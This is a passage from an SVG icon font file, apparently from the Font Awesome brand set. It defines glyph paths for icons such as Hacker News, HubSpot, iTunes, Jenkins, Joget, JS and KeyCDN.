c4.90039 5.7002 13.7998 16 13.7998 23.4004c0 7 -10.7002 14.0996 -25.7002 0.199219c-1.59961 -1.5 -3.09961 -3 -4.5 -4.5c0.400391 1.10059 1.10059 5.10059 1.10059 6.2002c0 2.7998 -1.40039 4 -4.2002 4c-1 0 -1.90039 -0.599609 -2.7002 -1.59961
c-2.59961 -3.10059 -3.89941 -7.5 -5.2998 -11.2998c-0.5 -1.80078 -1.09961 -3.60059 -1.7002 -5.5c-0.399414 -0.200195 -0.700195 -0.300781 -0.899414 -0.600586c-3.80078 -3.89941 -17.7002 -17 -23.1006 -17c-2.2998 0 -1.59961 3.60059 -1 5.7998
c1 3.40039 6.7998 17.7002 8.7002 22.3008c4.59961 11.0996 8 19.7998 13.2002 31.8994c3.89941 9.2002 3.7998 8.60059 4.5 10.5c0.700195 2.10059 0.700195 4.90039 -1 6.2002c-1 0.700195 -2 1.09961 -3.2002 1.09961c-2.40039 0 -4.7998 -1.39941 -6.09961 -4.69922
c-25.5 -64.4004 -25.2002 -63.3008 -26.4004 -68.2002c-2 -1.7002 -4.40039 -3.40039 -6.7998 -4.5c-3.10059 -1.40039 -6.7998 -2.2002 -6.7998 1.2002c0 3.69922 1.39941 8.19922 2.69922 11.6992c2.2002 6.10059 4.90039 11.1006 6.90039 16.7002
c0.900391 2.40039 1.2998 4.7002 -0.400391 6.90039c-0.799805 1 -1.89941 1.5 -3.19922 1.5c-2.60059 0 -4.10059 -2.60059 -5.2002 -5.10059c-0.700195 -1.5 -1.2998 -3.09961 -1.7998 -4.7998c-1.2002 -4 -3.60059 -8.7002 -5.60059 -12.2998
c-2.7998 -5 -6.5 -10.0996 -11.0996 -13.5c-2.2002 -1.59961 -4.5 -2.40039 -6.90039 -2.40039c-3.5 0 -2.39941 5.7002 -1.5 9c2.2002 7.80078 5.5 13.3008 9.2998 20.8008c1.30078 2.69922 2.30078 5.39941 -0.299805 7.19922c-0.5 0.300781 -1 0.5 -1.59961 0.700195
c-3.40039 0.900391 -6 -1.09961 -7.60059 -4.5c-3.09961 -6.2998 -5.39941 -11.7002 -7.09961 -16.2002c-3.2998 -8.89941 -6.90039 -18.2998 -4.59961 -23.7998c1.5 -3.7002 4.5 -5.09961 8.59961 -5.09961c9.7998 0 17.7998 6.7002 22.4004 14.8994
c-4.30078 -19.7998 8.19922 -17.2998 20 -8.09961c0.0996094 -0.400391 0.0996094 -0.799805 0.199219 -1.2002c1.5 -6.7002 8.7002 -6.7002 14.5 -4.09961c3.5 1.59961 8.2002 4.5 14.4004 10.5c0.200195 0.299805 0.799805 1.39941 -0.799805 -2.2998
c-7.2002 -16.2002 -13.5 -28.2002 -15 -34.3008c-0.200195 -0.899414 -0.299805 -1.7998 -0.299805 -2.69922c0 -1.80078 0.399414 -3.10059 1.2998 -3.7002c1.59961 -1.2002 4.2002 -1.2998 6.09961 -0.299805c1.7998 1 3.10059 2.59961 4 4.5
c1 2.19922 0.200195 0.699219 5.2002 14c5 13.3994 2.90039 7.7998 9.09961 22c1.90039 4.2998 4.2002 9.5 8.5 15.5c2.5 3.39941 5.5 7 8.7002 9.69922c5.7002 4.7002 11.7002 5.40039 11.7002 2.5c0 -2.19922 -3.2998 -6.39941 -4.7002 -8.09961
c-5.2998 -6.7002 -14.3994 -16.2998 -14.3994 -21.5c0 -9.5 12 -8 17.3994 -5.7002c7.2998 3.2002 13.9004 9.60059 19.6006 14.7998l-10.9004 -94.5996c-1.90039 -4.90039 -39.0996 -17.0996 -88.2002 -17.0996c-49 0 -86.2002 12.0996 -88.2002 17.0996l-7.59961 79.5996
c2.09961 -1.5 4.2998 -2.39941 7.7002 -2.39941c7.39941 0 16.0996 6.7002 21.5 11.7998c2.2998 2.2002 4.39941 4.40039 6.39941 6.59961c-1 -3 -7.09961 -22 -7.2998 -25.1992c-0.0996094 -1 -0.200195 -4.90039 0.799805 -6.30078
c0.5 -0.799805 1.40039 -1.19922 2.60059 -1.19922c2.89941 0 5.59961 4.69922 6.2998 7.5c0 0 1.7998 6.2998 7.59961 25.7998c6.30078 21.0996 10 24.5 10 34.7002c0 5.59961 -7.2998 6.7998 -9.89941 0l-5.2002 -15.5c-2.2002 -4.5 -8 -11.5 -12.5 -16
c-3.5 -3.5 -10.7998 -10.1006 -15.7998 -10.1006c-2.40039 0 -3.90039 1.40039 -4.90039 3.60059c-2.2998 5.2998 -0.899414 14.2998 0.600586 19.8994c2.59961 9.7002 6.89941 19.4004 12 28.2002c4.19922 7.2998 10.1992 15.7002 17.0996 20.7002
c6.59961 4.7998 12.7998 4.5 16.9004 -2.7998c1.5 -2.7002 3.7998 -7.30078 6.7998 -7.30078c2.5 0 5.7002 2.60059 4.5 9.10059c-0.5 2.5 -4.90039 8.7998 -10.1006 11.7998c-6 3.59961 -12.3994 3.59961 -18.6992 0.900391
c-19.2002 -8.2002 -34.1006 -35.2002 -40 -55.2002zM243.5 318.7c0 -21 -231.2 -21 -231.2 0c0 8.7998 51.7998 15.8994 115.601 15.8994c9 0 17.7998 -0.0996094 26.2998 -0.399414l12.5996 48.7002l61.2998 64.5c1.40039 1.39941 5.80078 0.199219 9.90039 -3.5
c4.09961 -3.7002 6.59961 -7.90039 5.2998 -9.30078l-0.0996094 -0.0996094l-57.2998 -60.5l-10 -40.7002c39.8994 -2.59961 67.5996 -8.09961 67.5996 -14.5996zM174.1 314.1c0 0.800781 -0.899414 1.5 -2.5 2.10059l-0.199219 -0.799805
c0 -1.30078 -5 -2.40039 -11.1006 -2.40039c-6.09961 0 -11.0996 1.09961 -11.0996 2.40039c0 0.0996094 0 0.199219 0.0996094 0.299805l0.200195 0.700195c-1.7998 -0.600586 -3 -1.40039 -3 -2.30078c0 -2.09961 6.2002 -3.69922 13.7002 -3.69922
c7.7002 -0.100586 13.8994 1.59961 13.8994 3.69922z" />
    <glyph glyph-name="hacker-news-square" unicode="&#xf3af;" 
d="M400 416c26.5 0 48 -21.5 48 -48v-352c0 -26.5 -21.5 -48 -48 -48h-352c-26.5 0 -48 21.5 -48 48v352c0 26.5 21.5 48 48 48h352zM21.2002 218.8h-0.200195c0.0996094 0.100586 0.200195 0.299805 0.299805 0.400391c0 -0.100586 0 -0.299805 -0.0996094 -0.400391z
M239.2 164.9l80.7998 155.1h-34.7998c-54.7998 -101.2 -48.2998 -98.5996 -60.6006 -125.6c-10.0996 24.3994 -6.7998 27.2998 -59.2998 125.6h-37.2998l79.7998 -153.3v-102.7h31.4004v100.9z" />
    <glyph glyph-name="hire-a-helper" unicode="&#xf3b0;" horiz-adv-x="512" 
d="M443.1 448c3.90039 -36.4004 32.5 -65.7998 68.9004 -71.7002v-370.5c-35.4004 -4 -64.9004 -33.3994 -67.9004 -69.7998h-372.199c-5.90039 36.4004 -34.5 63.9004 -71.9004 68.7998v371.5c37.4004 3.90039 67.9004 34.4004 71.9004 71.7002h371.199zM406.1 43.0996
c7.80078 0 5.80078 10.8008 0 10.8008c-10.2998 3.39941 -13.5 3.59961 -21.6992 13.7998c-7.80078 12.8994 -7.90039 44.3994 -7.90039 127.8v101.2c0 22.0996 12.2002 28.2998 28.5996 32.3994c8.90039 2.2002 3.90039 11.8008 -1 11.8008
c-36.5 0 -20.5996 -2 -57.0996 -2c-32.7002 0 -16.5 2 -49.2002 2c-3.2998 0 -8.5 -8.30078 -1 -10.8008c4.90039 -1.59961 27.6006 -3.69922 27.6006 -39.2998c0 -45.5996 0.199219 -55.7998 -1 -68.7998c0 -1.2998 -2.30078 -12.7998 -12.8008 -12.7998h-109.199
c-10.5 0 -12.8008 11.5 -12.8008 12.7998c-1.19922 13 -1 23.2002 -1 68.7998c0 35.6006 22.7002 37.7002 27.6006 39.2998c7.5 2.5 2.2998 10.8008 -1 10.8008c-32.7002 0 -16.5 -2 -49.2002 -2c-36.5 0 -20.5996 2 -57.0996 2c-5 0 -9.80078 -9.60059 -1 -11.8008
c16.3994 -4.09961 28.5996 -10.1992 28.5996 -32.3994v-101.2c0 -83.4004 -0.200195 -114.9 -7.90039 -127.8c-8.19922 -10.2998 -11.5 -10.4004 -21.6992 -13.7998c-5.80078 0 -7.90039 -10.8008 0 -10.8008c36.2998 0 18.7998 2 55.0996 2c35.7998 0 21 -2 56.0996 -2
c6 0 4.90039 8.2002 0 9.80078c-22.7998 7.59961 -22.8994 10.2998 -24.5996 12.7998c-10.4004 15.5996 -5.90039 83 -5.90039 113c0 5.2998 6.40039 12.7998 13.8008 12.7998h111.199c7.40039 0 13.8008 -7.5 13.8008 -12.7998c0 -30 4.5 -97.4004 -5.90039 -113
c-1.7002 -2.60059 -1.7998 -5.2002 -24.5996 -12.7998c-4.90039 -1.60059 -5.90039 -9.80078 0 -9.80078c35.0996 0 20.2998 2 56.0996 2c36.2998 0 18.7998 -2 55.0996 -2z" />
    <glyph glyph-name="hotjar" unicode="&#xf3b1;" 
d="M414.9 286.5c30 -53 41.7998 -121.6 26.2998 -180.9c-14.7002 -56.6992 -68.2998 -120.3 -148.8 -145.6c54.5 76.9004 43.8994 200.1 -27.1006 215.5c54.2002 -93.9004 -53.7002 -180.3 -110.8 -93.9004c-2.5 -7.19922 -25.0996 -74.5 4.09961 -129.6
c-61.0996 9.09961 -117.8 33.5 -144.6 93.4004c-35 78.1992 -2.7002 149.8 79 204.899c129.2 87.2998 28.0996 197.7 28.0996 197.7s219.101 -29 293.801 -161.5z" />
    <glyph glyph-name="hubspot" unicode="&#xf3b2;" horiz-adv-x="512" 
d="M267.4 236.4l-163.2 114.699c-7.90039 -4.69922 -17 -7.59961 -26.7998 -7.59961c-28.8008 0 -52.2002 23.4004 -52.2002 52.2998c0 28.7998 23.3994 52.2002 52.2002 52.2002c28.8994 0 52.3994 -23.4004 52.3994 -52.2002c0 -4.7998 -0.799805 -9.39941 -2 -13.7998
c51.4004 -39.0996 141.3 -103.9 168.9 -124.8c13.0996 6.89941 27.5 11.5 42.7002 13.5996v61.2002c-17.5 7.40039 -28.2002 23.7998 -28.2002 42.9004c0 26.0996 20.5996 47.8994 46.7002 47.8994c26.0996 0 47 -21.7998 47 -47.8994
c0 -19.1006 -10.7002 -35.5 -28.2002 -42.9004v-61.5996c62.5 -9.5 110.2 -63.5 110.2 -128.7c0 -71.9004 -58.1006 -130.2 -130 -130.2c-29.9004 0 -57.3008 10 -79.3008 26.9004l-50 -50.2002c1.30078 -3.90039 1.90039 -7.90039 1.90039 -12.1006
c0 -10.6992 -4.2002 -20.8994 -11.7998 -28.5c-7.7002 -7.69922 -17.7998 -11.5996 -28.6006 -11.5996c-10.6992 0 -20.8994 4 -28.5 11.5996c-7.59961 7.60059 -11.7998 17.7002 -11.7998 28.5c0 10.8008 4.2002 21 11.7998 28.6006
c7.60059 7.59961 17.7002 11.7998 28.5 11.7998c4.90039 0 9.60059 -0.900391 14 -2.5l49.5 49.7998c-16.2998 21.7002 -26 48.7002 -26 78c0 37.2998 15.7002 70.9004 40.8008 94.6006zM356.9 72.7998c38.0996 0 69 30.9004 69 69c0 38.1006 -30.9004 69 -69 69
c-38.1006 0 -69 -30.8994 -69 -69c0 -38.0996 30.8994 -69 69 -69z" />
    <glyph glyph-name="itunes" unicode="&#xf3b4;" 
d="M223.6 367.7c94.5 0 171.2 -76.7002 171.2 -171.3c0 -94.5 -76.5996 -171.2 -171.2 -171.2c-94.5996 0 -171.1 76.7998 -171.1 171.3s76.5 171.2 171.1 171.2zM303 127.7c1.40039 6.2002 0.900391 -3 1 167.6c0 5.7002 -3.2998 9.10059 -9 8.7002
c-1.7998 0 -14.0996 -2.40039 -115.1 -21.4004c-0.900391 0 -4.60059 -1 -6.7002 -2.69922c-2 -1.60059 -3.10059 -3.80078 -3.5 -6.40039c-1.7002 -6.7002 2.39941 -128 -2.60059 -133.7c-2.09961 -2.5 -4.69922 -3.2002 -7.69922 -3.7002
c-17.7002 -3.19922 -29.6006 -4.7998 -38 -12.7998c-14.5 -14.2002 -7 -38.8994 14.3994 -42.8994c8 -1.40039 23.1006 0.599609 31.4004 5.19922c7.2998 3.80078 12.7998 10.6006 14.8994 19.6006c1.7002 7.7002 1.2002 2.39941 1.2002 118.5
c0 5.7002 1.7002 7.2002 6.7002 8.2998c0 0 87.9004 16.4004 91.9004 17.0996c5.69922 1 8.39941 -0.5 8.39941 -6.09961c0 -78.7998 1 -77.2002 -2.2002 -80.7998c-2.09961 -2.5 -4.69922 -3.2002 -7.69922 -3.7002c-17.7002 -3.2002 -29.6006 -4.7998 -38 -12.7998
c-10.6006 -10.4004 -10.4004 -26.7998 1.39941 -36.7998c9.7002 -7.80078 19.7998 -7.2002 31.9004 -5c13.7998 2.59961 24.0996 10.1992 27.2998 23.7998zM345.2 416c56.8994 0 102.8 -45.9004 102.8 -102.8v-242.4c0 -56.8994 -45.7998 -102.8 -102.8 -102.8h-242.4
c-56.8994 0 -102.8 45.9004 -102.8 102.8v242.4c0 56.8994 45.9004 102.8 102.8 102.8h242.4zM223.6 4c106.301 0 192.5 86.2002 192.5 192.5s-86.1992 192.5 -192.5 192.5c-106.3 0 -192.5 -86.2002 -192.5 -192.5s86.2002 -192.5 192.5 -192.5z" />
    <glyph glyph-name="itunes-note" unicode="&#xf3b5;" horiz-adv-x="384" 
d="M381.9 59.7998c-6.40039 -27.3994 -27.2002 -42.7998 -55.1006 -48c-24.5 -4.5 -44.8994 -5.59961 -64.5 10.2002c-23.8994 20.0996 -24.2002 53.4004 -2.7002 74.4004c17 16.1992 40.9004 19.5 76.8008 25.7998c6 1.09961 11.1992 2.5 15.5996 7.39941
c6.40039 7.2002 4.40039 4.10059 4.40039 163.2c0 11.2002 -5.5 14.2998 -17 12.2998c-8.2002 -1.39941 -185.7 -34.5996 -185.7 -34.5996c-10.2002 -2.2002 -13.4004 -5.2002 -13.4004 -16.7002c0 -234.7 1.10059 -223.899 -2.5 -239.5
c-4.2002 -18.2002 -15.3994 -31.8994 -30.2002 -39.5c-16.7998 -9.2998 -47.1992 -13.3994 -63.3994 -10.3994c-43.2002 8.09961 -58.4004 58 -29.1006 86.5996c17 16.2002 40.9004 19.5 76.8008 25.7998c6 1.10059 11.1992 2.5 15.5996 7.40039
c10.0996 11.5 1.7998 256.6 5.2002 270.2c0.799805 5.19922 3 9.59961 7.09961 12.8994c4.2002 3.5 11.7998 5.5 13.4004 5.5c204 38.2002 228.899 43.1006 232.399 43.1006c11.5 0.799805 18.1006 -6 18.1006 -17.6006c0.200195 -344.5 1.09961 -326 -1.7998 -338.5z" />
    <glyph glyph-name="jenkins" unicode="&#xf3b6;" horiz-adv-x="511" 
d="M487.1 23c1.5 -11.9004 -5.2998 -28.2998 -8.69922 -39.7002c-4.90039 -16.2998 -9.7002 -31.8994 -14.6006 -47.2002h-422c-0.700195 1.90039 -1.39941 4 -2.09961 6c-4.60059 14.2002 -12.6006 31.7002 -14.7002 45.8008
c-3.09961 20.8994 16.5996 22.0996 29.2002 31.0996c19.5 14 34.7998 21.7998 55.8994 34.2998c6.30078 3.7998 25.1006 13.2002 27.3008 17.6006c4.2998 8.69922 -7.30078 20.8994 -10.4004 27.6992c-4.90039 10.7002 -7.5 19.8008 -8.2002 30.4004
c-17.7002 2.7998 -31.0996 13.2998 -39.2002 25.2002c-13.3994 19.7002 -22.6992 56 -11.0996 83.7002c0.900391 2.19922 5.40039 6.5 6.09961 9.7998c1.40039 6.59961 -2.5 15.3994 -2.69922 22.3994c-1.2002 36 6.09961 67 30.2998 77.8008
c9.7998 39.0996 45 52.1992 78.0996 71.5996c12.2998 7.2998 26 11.9004 40.1006 17.0996c50.5 18.7002 128.1 15.1006 170.1 -16.5996c17.7998 -13.5 46.2002 -41.9004 56.4004 -62.5c26.8994 -54.2998 25 -145.1 6.19922 -211.2
c-2.5 -8.89941 -6.19922 -21.8994 -11.2998 -32.5996c-3.59961 -7.40039 -14.7002 -22.2998 -13.2998 -28.9004c1.40039 -6.7998 25.2998 -24.8994 30.4004 -29.8994c9.19922 -8.80078 26.7998 -20.7002 28.1992 -31.9004zM205.9 414.3
c-33.2002 -9.39941 -75.7002 -33.5 -89.3008 -63.3994c10.6006 1.5 17.9004 6.7998 28.3008 7.5c3.89941 0.299805 9.09961 -1.60059 13.5996 -0.5c9 2.2998 16.5996 22.5 23.4004 30c6.59961 7.39941 14.5996 10.5 20 17.1992c3.5 1.7002 8.69922 1.60059 8.89941 6.80078
c-1.5 1.69922 -3.09961 2.89941 -4.89941 2.39941zM101.1 320.7c-14.6992 -16.1006 -11.5996 -46.2998 -9.7998 -67.7998c26.5 16.6992 61.6006 -1.30078 61.2998 -29.6006c12.6006 0.299805 4.7002 15.7998 2.40039 25.7002c-7.5 32.5996 12.5996 67.9004 0.900391 97.5996
c-22.7002 -1.7998 -41.3008 -11 -54.8008 -25.8994zM137.8 120.5c4.90039 -20 15.7002 -46 26.2998 -61.4004c13.6006 -19.3994 40.1006 -22.2998 68.7002 -24.1992c5.10059 11 23.9004 10.0996 36.2002 7.19922c-14.7002 5.80078 -28.4004 19.9004 -39.7002 32.4004
c-13 14.2998 -26.0996 29.7002 -26.7998 48.4004c24.5 -34 44.7998 -63.8008 89.5 -78.8008c33.7998 -11.2998 73.2002 5.2002 99.2002 23.4004c10.7998 7.59961 17.2002 19.5996 24.8994 30.5996c28.7002 41.2002 42 100.101 39.1006 157.101
c-1.2002 23.5 -1.10059 47 -9 62.7998c-8.2998 16.5996 -36.2002 31.2998 -52.5 16.4004c-3 16.0996 13.5996 26.0996 33.0996 20.2998c-13.8994 18 -28.5996 39.5996 -48.2998 50.7002c-34.4004 19.5 -92.7002 34.0996 -129.3 15.7998
c-29.6006 -14.7002 -69.5 -39.1006 -83.1006 -70c12.7002 -29.7998 -3.7998 -57.1006 -4.7998 -87.4004c-0.599609 -16.0996 7.60059 -30.2002 8.2002 -47.7002c-4.40039 -7.19922 -17.7002 -8.09961 -26.9004 -7.59961c-3.09961 15.5 -8.5 32.9004 -24.5 34.7002
c-22.5 2.39941 -39.0996 -16.2998 -40.0996 -35.7998c-1.2002 -23 17.7002 -61 44.4004 -58.4004c10.2998 1.09961 12.7998 11.4004 24.0996 11.2998c6.09961 -12.2002 -9.40039 -16 -11 -24.7002c-0.400391 -2.19922 1.2998 -11 2.2998 -15.0996zM359.8 -3.59961
c-1.59961 -4.40039 0.299805 -10.4004 -0.599609 -16.5c14.8994 -4.2002 31.8994 -6.40039 50.7002 -7c3.69922 4.7998 4.89941 13.7998 4.5 22.7998c-0.600586 10.7998 -3.40039 33.0996 -10.1006 37c-14.0996 8.2002 -39 -16.5 -49.5996 -20.2998
c1.2002 -3.40039 3.09961 -6 3.2002 -10.2002c6.2998 1.5 13.8994 0.5 19.2998 -2.2002c-6.2998 -0.700195 -13.2998 -0.599609 -17.4004 -3.59961zM342.6 16.4004c7.60059 5.5 14.3008 12 22.2002 17.0996c-18.2002 -1.59961 -41 -12.9004 -59 -4.90039
c-0.0996094 -0.899414 -1.2998 -0.599609 -1.5 -1.39941c12.2998 -9.60059 21.5 -11.6006 38.2998 -10.7998zM330.5 -16.7998c26.9004 -8.40039 22.2002 36.7998 -2.7998 20.2002c-0.700195 -8.2002 1.2002 -10.8008 2.7998 -20.2002zM226 9.40039
c0 6.19922 3.59961 12 2.7998 16.3994c-13.7998 2.40039 -31.8994 0.799805 -41.2998 7.2998c-9.59961 -9.69922 26.9004 -23 38.5 -23.6992zM57.7002 -49.0996v-0.100586h180.7c-0.800781 2.5 -1.5 4.90039 -2.2002 7.2002c-4.7998 15.2998 -7.5 26.7002 -8.7002 35.5
c-19.2002 9.2002 -39.7002 18.5 -56.2002 30.2002c-3 2.2002 -23.3994 28.7002 -26.2002 27.5996c-36.8994 -14.5996 -71.3994 -39.7002 -102.199 -63.5c5.59961 -11.7998 10.5 -24.2002 14.7998 -36.8994zM298.3 -54.7998h-0.799805
c0.299805 0.200195 0.5 0.399414 0.799805 0.5v-0.5zM305.8 -49.0996h9.60059c-1 1.5 -2.10059 2.89941 -3.2002 4.2998c-2.10059 -1.5 -4.2998 -2.90039 -6.40039 -4.2998zM320.9 -24.4004c0.0996094 3.60059 0.299805 7.2002 0.399414 10.6006
c-6.5 3.2002 -14 5.5 -23.5 5.89941c6.5 3.30078 15.9004 3.2002 21.7998 7.10059c0.100586 1.5 0.100586 2.89941 0.200195 4.2998c-10.7998 0.900391 -14.7998 5.59961 -21.8994 9.5c-11.6006 6.40039 -29 13.2002 -43.9004 16.0996
c-18.5 3.60059 -16.7998 -25.1992 -16 -42.3994c0.700195 -13.6006 7.7002 -28 10.7998 -37c1.5 -4.2002 1.7998 -8.7002 5.40039 -9.5c6.39941 -1.5 27.3994 6.89941 33.3994 10.2002c12.7002 6.89941 22.5 17.8994 33.3008 25.1992zM374.3 -49.0996l0.600586 12.5996
c-11.2002 -0.700195 -17.5 10.2002 -25.4004 11c-6.90039 0.700195 -12.7002 -7.90039 -21.7002 -4.2002c-2 -2.2002 -3.89941 -4.7002 -6 -6.89941c3.2002 -3.90039 6.10059 -8.10059 8.90039 -12.5h17.3994c0.200195 3.19922 2.80078 5.7998 6.10059 5.7998
s6 -2.60059 6.09961 -5.7998h14zM383 -49.0996h36.2998c-6.7002 10.1992 -20.0996 18.7998 -35.7002 11.5c-0.199219 -3.7002 -0.399414 -7.5 -0.599609 -11.5zM466.4 -12.0996c1.19922 6.19922 4.59961 19.5996 3.7998 25.0996
c-1.40039 9.7998 -14.6006 17.0996 -21.4004 23.0996c-12.3994 11.1006 -20.2002 21 -33.2002 31.4004c-5.19922 -7.7998 -16.5 -13 -20.7998 -19.2998c30.7002 14.8994 36.2998 -55.7998 24.2002 -78.5c1.90039 -6.7998 8.2998 -9.40039 10.9004 -15.5
c-0.700195 -1.10059 -1.30078 -2.2002 -1.90039 -3.2998h27.9004c0.199219 0 0.399414 0 0.599609 -0.100586c4.09961 13.1006 7.59961 25.9004 9.90039 37.1006zM222.2 317.5c5.39941 14.9004 27.2002 34.7002 45 32c7.7002 -1.2002 18 -8.2002 12.2002 -17.7002
c-30.2002 7 -45.2002 -12.5996 -54.4004 -33.0996c-8.09961 2 -4.90039 13.0996 -2.7998 18.7998zM406.3 254.4c8.2002 3.59961 22.4004 0.699219 29.6006 5.2998c-4.2002 11.5 -10.3008 21.3994 -9.30078 37.7002c0.5 0 1 0 1.40039 -0.100586
c6.7998 -14.2002 12.7002 -29.2002 21.4004 -41.7002c-5.7002 -13.5 -43.6006 -25.3994 -43.1006 -1.19922zM309.5 251.7c-6.7998 10.8994 -19 32.5 -14.5 45.2998c6.5 -11.9004 8.59961 -24.4004 17.7998 -33.2998c4.10059 -4 12.2002 -9 8.2002 -20.2002
c-0.900391 -2.7002 -7.7998 -8.59961 -11.7002 -9.7002c-14.3994 -4.2998 -47.8994 -0.899414 -36.5996 17.1006c11.8994 -0.700195 27.8994 -7.80078 36.7998 0.799805zM336.8 181.7c3.7998 -6.60059 1.40039 -18.7002 12.1006 -20.6006
c20.1992 -3.39941 43.5996 12.3008 58.0996 17.8008c9 15.1992 -0.799805 20.6992 -8.90039 30.5c-16.5996 20 -38.7998 44.7998 -38 74.6992c6.7002 4.90039 7.30078 -7.39941 8.2002 -9.69922c8.7002 -20.3008 30.4004 -46.2002 46.2998 -63.5
c3.90039 -4.30078 10.3008 -8.40039 11 -11.2002c2.10059 -8.2002 -5.39941 -18 -4.5 -23.5c-21.6992 -13.9004 -45.7998 -29.1006 -81.3994 -25.6006c-7.40039 6.7002 -10.2998 21.4004 -2.90039 31.1006zM135.5 190.9c-6.7998 3.89941 -8.40039 21 -16.4004 21.3994
c-11.3994 0.700195 -9.2998 -22.2002 -9.2998 -35.5c-7.7998 7.10059 -9.2002 29.1006 -3.5 40.2998c-6.59961 3.2002 -9.5 -3.59961 -13.0996 -5.89941c4.7002 34.0996 49.7998 15.7998 42.2998 -20.2998zM435.1 162.1c-10.0996 -19.1992 -24.3994 -40.3994 -54 -41
c-0.599609 6.2002 -1.09961 15.6006 0 19.4004c22.7002 2.2002 36.6006 13.7002 54 21.5996zM293.2 149.7c18.8994 -9.90039 53.5996 -11 79.2998 -10.2002c1.40039 -5.59961 1.2998 -12.5996 1.40039 -19.4004c-33 -1.7998 -72 6.40039 -80.7002 29.6006zM385.4 103
c-1.7002 -4.2998 -5.30078 -9.2998 -9.80078 -11.0996c-12.0996 -4.90039 -45.5996 -8.7002 -62.3994 0.299805c-10.7002 5.7002 -17.5 18.5 -23.4004 26c-2.7998 3.59961 -16.8994 12.8994 -0.200195 12.8994c13.1006 -32.6992 58 -29 95.8008 -28.0996z" />
    <glyph glyph-name="joget" unicode="&#xf3b7;" horiz-adv-x="496" 
d="M378.1 403c116.601 -71.7998 152.9 -224.6 81 -341.2c-71.8994 -116.5 -224.6 -152.8 -341.199 -80.8994c-116.601 71.8994 -152.9 224.6 -81 341.199c46.8994 76 128.1 117.9 211.3 117.9c44.3994 0 89.3994 -11.9004 129.899 -37zM429.9 79.7998
c5.2998 8.7002 9.89941 17.6006 13.8994 26.6006c-32.0996 -1.10059 -157.1 1.5 -208.8 -17.6006c-58.4004 -21.5 -36.9004 -53.3994 -31.2002 -67.0996c3.7998 -9.10059 14.7002 -28.7998 23.7002 -42.4004c6.7998 -0.599609 13.5996 -1 20.4004 -1
c71.5996 0 141.6 36 182 101.5zM229.1 166.1c51 -1.2998 205.4 -4.39941 230.301 -4.89941c11.8994 81.7998 -24.5 166.6 -99.3008 212.7c-100.5 61.8994 -232.1 30.6992 -294 -69.8008c-28.5996 -46.3994 -37.2998 -99.3994 -28.5 -149.1
c11 40.9004 49.7002 131.5 178.301 140.2c50.8994 4 41.5 -19.2002 23.5996 -29.7002c-17.7998 -10.5 -45.7002 -23.7998 -68.9004 -51.2002c-23.1992 -27.3994 3 -46.7998 58.5 -48.2002zM412.9 220.9c22.6992 -6 19.0996 -15.5 19.0996 -15.5l-46.5 -23.4004
l-169.5 -1.59961s33.7998 10.7998 65.2998 31.2998c26 16.8994 49.7002 35.5996 67.5 35.5996c3.7002 0 7.2002 -0.899414 10.4004 -2.7002c18.5 -10.5996 -2.90039 -18.1992 -13.4004 -24.5996s-50.7002 -34.5 -50.7002 -34.5s1.40039 -7.59961 31.1006 8.2002
c29.7002 15.8994 64 33.2002 86.7002 27.2002z" />
    <glyph glyph-name="js" unicode="&#xf3b8;" 
d="M0 416h448v-448h-448v448zM243.8 66.5996v143.7h-42.0996v-143.1c0 -21.1006 -8.7998 -26.5 -22.6006 -26.5c-14.5 0 -20.5 9.89941 -27.0996 21.5996l-34.2998 -20.7002c10 -21.0996 29.5 -38.5 63.2002 -38.5c37.2998 0 62.8994 19.9004 62.8994 63.5zM343.4 3.09961
c39.8994 0 69.6992 20.8008 69.6992 58.6006c0 35.2002 -20.0996 50.8994 -55.8994 66.2002l-10.5 4.5c-18.1006 7.89941 -25.9004 13 -25.9004 25.5996c0 10.2002 7.7998 18 20.1006 18c12.0996 0 19.8994 -5.09961 27.0996 -18l32.7998 21
c-13.7998 24.4004 -33 33.7002 -59.7998 33.7002c-37.5 0 -61.5996 -24 -61.5996 -55.6006c0 -34.2998 20.0996 -50.5996 50.5 -63.5l10.5 -4.5c19.2998 -8.5 30.6992 -13.5996 30.6992 -28c0 -12.0996 -11.1992 -20.7998 -28.5996 -20.7998
c-20.7002 0 -32.5 10.9004 -41.5 25.6006l-34.2998 -19.8008c12.2998 -24.3994 37.5996 -43 76.7002 -43z" />
    <glyph glyph-name="js-square" unicode="&#xf3b9;" 
d="M400 416c26.5 0 48 -21.5 48 -48v-352c0 -26.5 -21.5 -48 -48 -48h-352c-26.5 0 -48 21.5 -48 48v352c0 26.5 21.5 48 48 48h352zM243.8 66.5996v143.7h-42.0996v-143.1c0 -21.1006 -8.7998 -26.5 -22.6006 -26.5c-14.5 0 -20.5 9.89941 -27.0996 21.5996
l-34.2998 -20.7002c10 -21.0996 29.5 -38.5 63.2002 -38.5c37.2998 0 62.8994 19.9004 62.8994 63.5zM343.4 3.09961c39.8994 0 69.6992 20.8008 69.6992 58.6006c0 35.2002 -20.0996 50.8994 -55.8994 66.2002l-10.5 4.5c-18.1006 7.89941 -25.9004 13 -25.9004 25.5996
c0 10.2002 7.7998 18 20.1006 18c12.0996 0 19.8994 -5.09961 27.0996 -18l32.7998 21c-13.7998 24.4004 -33 33.7002 -59.7998 33.7002c-37.5 0 -61.5996 -24 -61.5996 -55.6006c0 -34.2998 20.0996 -50.5996 50.5 -63.5l10.5 -4.5
c19.2998 -8.5 30.6992 -13.5996 30.6992 -28c0 -12.0996 -11.1992 -20.7998 -28.5996 -20.7998c-20.7002 0 -32.5 10.9004 -41.5 25.6006l-34.2998 -19.8008c12.2998 -24.3994 37.5996 -43 76.7002 -43z" />
    <glyph glyph-name="keycdn" unicode="&#xf3ba;" horiz-adv-x="512" 
d="M63.7998 38.7002l60.5 59c32.1006 -42.7998 71.1006 -66 126.601 -67.4004c30.5 -0.700195 60.2998 7 86.3994 22.4004c5.10059 -5.2998 18.5 -19.5 20.9004 -22c-32.2002 -20.7002 -69.6006 -31.1006 -108.101 -30.2002
c-43.2998 1.09961 -84.5996 16.7002 -117.699 44.4004c0.299805 0.599609 -38.2002 -37.5 -38.6006 -37.9004c9.5 -29.7998 -13.0996 -62.4004 -46.2998 -62.4004c-26.7998 0.100586 -47.5 21.7002 -47.5 48.5c0 34.3008 33.0996 56.6006 63.7998 45.6006zM418.7 291.1
c19.0996 -31.2998 29.5996 -67.3994 28.7002 -104c-1.10059 -44.7998 -19 -87.5 -48.6006 -121c0.299805 -0.299805 23.7998 -25.1992 24.1006 -25.5c9.59961 1.30078 19.1992 -2 25.8994 -9.09961c11.2998 -12 10.9004 -30.9004 -1.09961 -42.4004
